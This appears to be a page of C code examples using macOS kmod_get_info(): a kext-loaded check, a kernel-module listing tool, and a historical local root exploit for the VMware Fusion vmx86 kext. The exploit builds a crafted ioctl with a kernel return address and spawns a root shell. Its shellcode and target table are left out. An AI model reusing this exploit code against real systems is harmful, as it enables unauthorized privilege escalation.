Ejemplo n.º 1
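/*
 * Return 1 when a kernel extension named `kextname` appears in the
 * kernel's loaded-module list, 0 when it does not or when the list
 * could not be obtained.  Any failure is reported on stderr and
 * treated as "not loaded" so that the caller (loadsmbvfs) fails.
 *
 * The original version leaked both the kernel task port and the
 * out-of-line buffer returned by kmod_get_info(); both are released
 * here before returning.
 */
static int
kextisloaded(char * kextname)
{
	mach_port_t kernel_port;
	kmod_info_t *k, *loaded_modules = 0;
	mach_msg_type_number_t loaded_count = 0;
	int err, found = 0;

	/* on error return not loaded - to make loadsmbvfs fail */

	/* strcmp() on a NULL name would be undefined; treat it as not loaded */
	if (kextname == NULL)
		return (0);

	err = task_for_pid(mach_task_self(), 0, &kernel_port);
	if (err) {
		fprintf(stderr, "%s: %s: %s\n", __progname,
			"unable to get kernel task port",
			mach_error_string(err));
		return (0);
	}
	err = kmod_get_info(kernel_port, (void *)&loaded_modules,
			    &loaded_count);
	/* the port is only needed for the kmod_get_info() call above */
	mach_port_deallocate(mach_task_self(), kernel_port);
	if (err) {
		fprintf(stderr, "%s: %s: %s\n", __progname,
			"kmod_get_info() failed",
			mach_error_string(err));
		return (0);
	}
	/* entries are laid out back to back; a non-NULL next means "one more" */
	for (k = loaded_modules; k; k = k->next ? k+1 : 0) {
		if (!strcmp(k->name, kextname)) {
			found = 1;
			break;
		}
	}
	/*
	 * kmod_get_info() returns an out-of-line buffer owned by the caller.
	 * NOTE(review): loaded_count is used as the byte length of that
	 * buffer, as the other kmod_get_info() callers do — confirm.
	 */
	if (loaded_modules)
		vm_deallocate(mach_task_self(), (vm_address_t)loaded_modules,
			      loaded_count);
	return (found);
}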
Ejemplo n.º 2
/*
 * Historical proof-of-concept for a local privilege escalation in the
 * VMware Fusion vmx86 kext (the banner below names the affected versions).
 * It is kept on this page only as an example of enumerating loaded kexts
 * with kmod_get_info(); the request construction is deliberately left
 * undocumented.  The fix is the vendor update.  From a defender's view the
 * observable sequence is an unprivileged process opening /dev/vmmon,
 * issuing one VMX86_INIT_IOCTL, then checking getuid() and exec'ing a shell.
 *
 * Code-quality notes: the kmod list returned by kmod_get_info() is never
 * released, the host port is never deallocated, and the ioctl result `r`
 * is never inspected.  `targets_t`, `zleopard`, `struct ioctl_req` and
 * VMX86_INIT_IOCTL are defined outside this excerpt.
 */
int
main (int argc, char **argv)
{
  kmod_info_t *kmod_list, *k;
  mach_port_t host_port;
  kern_return_t mach_r;
  struct ioctl_req req;
  unsigned int count;
  int shell_addr;
  int fd, id, i, r;

  printf ("VMware Fusion <= 2.0.5 vmx86 kext local kernel root exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

  /* out-of-line list of loaded kexts; never vm_deallocate()d below */
  host_port = mach_host_self ();
  mach_r = kmod_get_info (host_port, (void *) &kmod_list, &count);
  if (mach_r != KERN_SUCCESS)
    {
      fprintf (stderr, "* couldn't get list of loaded kexts from kernel - %s\n",
               mach_error_string (mach_r));
      exit (EXIT_FAILURE);
    }

  /* entries are laid out back to back; a non-NULL next means "one more" */
  for (k = kmod_list; k; k = (k->next) ? (k + 1) : NULL)
    if (strcmp (k->name, "com.vmware.kext.vmx86") == 0)
      break;

  if (k == NULL)
    {
      fprintf (stderr, "%s: vmx86 kext not loaded?\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  /* version-specific table lookup; falls through when no entry matches */
  for (i = 0; targets_t[i].name; i++)
    if (strcmp (targets_t[i].name, k->version) == 0)
      {
        shell_addr = targets_t[i].shell_addr;
        break;
      }

  if (targets_t[i].name == NULL)
    {
      fprintf (stderr, "%s: unsupported vmx86 version found :( [%s]\n",
               argv[0], k->version);
      exit (EXIT_FAILURE);
    }

  printf ("* kmod: %s, version: %s, addr: 0x%08X -> 0x%08X\n",
          strrchr (k->name, '.') + 1, k->version, (int) k->address, (int) (k->address + k->size));
  printf ("* ret addr: 0x%08X + 0x%08X = @0x%08X\n",
          (int) k->address, shell_addr + 0x1000, (int) k->address + shell_addr + 0x1000);

  fd = open ("/dev/vmmon", O_RDONLY);
  if (fd < 0)
    {
      fprintf (stderr, "%s: open failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  memset (&req, 0xCC, sizeof req);
  memcpy (&req.pad, zleopard, sizeof zleopard - 1);
  *(unsigned int *) &req.pad[0x21] = k->address + shell_addr + 0x1000;

  printf ("* hitting...");
  fflush (stdout);
  sleep (2);

  /* the ioctl's return value is stored but never checked */
  r = ioctl (fd, VMX86_INIT_IOCTL, &req);
  printf ("done\n\n");
  close (fd);

  /* success is judged only by the effective change in uid */
  id = getuid ();
  printf ("* getuid(): %d\n", id);
  if (id == 0)
    {
      char *args[] = { "/bin/bash", NULL };
      printf ("+Wh00t\n\n");

      execve (args[0], args, NULL);
    }
  else
    fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);

  return (EXIT_SUCCESS);
}
Ejemplo n.º 3
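/*
 * int main(int argc, const char * argv[])
 *
 * List the kernel modules reported by kmod_get_info().  Options:
 *   -v  full listing (id, refs, address, size, size - hdr_size, name)
 *   -s  short listing (id, name)
 *   -k  full listing restricted to modules whose size - hdr_size is non-zero
 *   -u  full listing restricted to modules whose size - hdr_size is zero
 *   -h  print usage
 * With no option, -h or an unknown option, usage() is called.  Exits with
 * EXIT_FAILURE when the module list cannot be obtained or when nothing
 * was printed (a placeholder "ZeroDriverFound" row is emitted first).
 *
 * Fixes relative to the original: the list is checked for NULL before
 * kmod_info_array_count()/kmod_info_array_sort() dereference it, an empty
 * list (cnt == 0) no longer reads list[0], and the list buffer is released
 * on the negative-count error path.
 */
int main(
	int argc, const char * argv[])
{
	kern_return_t k_ret;
	kmod_info_array_t list;
	mach_msg_type_number_t b = 0;
	int cnt = 0;
	kmod_info_t *m;
	mach_port_t host;
	int c, i = 0, j = 0, isopt = 0, print = 1;
	int show_all = 0, show_short = 0, only_nonzero = 0, only_zero = 0, want_help = 0;
	
	if(argv[0]) { progname = (char *)getprogname(); }
	
	while ((c = getopt(argc, (char **)argv, "vskuh")) != -1)
	{
		switch(c) {
			case 'v':
				show_all = 1;
				break;
			case 's':
				show_short = 1;
				break;
			case 'k':
				only_nonzero = 1;
				break;
			case 'u':
				only_zero = 1;
				break;
			case 'h':
				want_help = 1;
				break;
			case '?':
			default:
				goto USAGE;
		}	
		++isopt;
	}
	
	if(!isopt || want_help)
		goto USAGE;
	
	/* the host port is only needed for the kmod_get_info() call */
	host = mach_host_self();
	k_ret = kmod_get_info(host, (void *)&list, &b);
	mach_port_deallocate(mach_task_self(), host);
	
	if(k_ret != KERN_SUCCESS) {
		exit(EXIT_FAILURE);
	}
	
	/* guard before the helpers below dereference the buffer */
	if(!list)
		exit(EXIT_FAILURE);
	
	cnt = kmod_info_array_count(list);
	if(0 > cnt) {
		/* `b` is the byte length of the out-of-line buffer */
		vm_deallocate(mach_task_self(),(vm_address_t)list,b);
		exit(EXIT_FAILURE);
	}
	kmod_info_array_sort(list,(size_t) cnt);
	
	if(show_all || only_nonzero || only_zero) {
		puts("   ID \t   REFS\t ADDRESS \t SIZE \t\t WIRED \t\t NAME");
	} else if(show_short)
		puts("   ID \t NAME");
	
	/* a counted loop so that cnt == 0 never touches list[0] */
	for (i = 0; i < cnt; ++i)
	{
		m = (kmod_info_t *) &(list[i]);
		if(show_all || only_nonzero || only_zero) {
			/* -k and -u filter on the size - hdr_size column ("WIRED") */
			if(only_nonzero && (m->size - m->hdr_size) == 0x0)
				print = 0;
			else if(only_zero && (m->size - m->hdr_size) != 0x0)
				print = 0;
			else
				print = 1;

			if(print) {
				printf(
					"%5d \t %4d \t %-10p \t %-10p \t %-10p \t %s (%s)\n",
					m->id,
					m->reference_count,
					(void *) m->address,
					(void *) m->size,
					(void *) (m->size - m->hdr_size),
					m->name,
					m->version			
					);
				++j;
			}
		} else if(show_short) {
			printf("%5d \t %s (%s)\n", m->id, m->name, m->version);
			++j;
		}
	}
	
	vm_deallocate(mach_task_self(),(vm_address_t)list,b);
	
	/* nothing matched: print a placeholder row and report failure */
	if(!j) {
		printf("%5d \t %4d \t %-10p \t %-10p \t %-10p \t %s (%s)\n",-1, 0, (void *) 0x0, (void *) 0x0, (void *) 0x0, "com.apple.ZeroDriverFound","None");
		exit(EXIT_FAILURE);
	}
	
	goto SUCCESS;
	
USAGE:
	usage();

SUCCESS:
	return EXIT_SUCCESS;
}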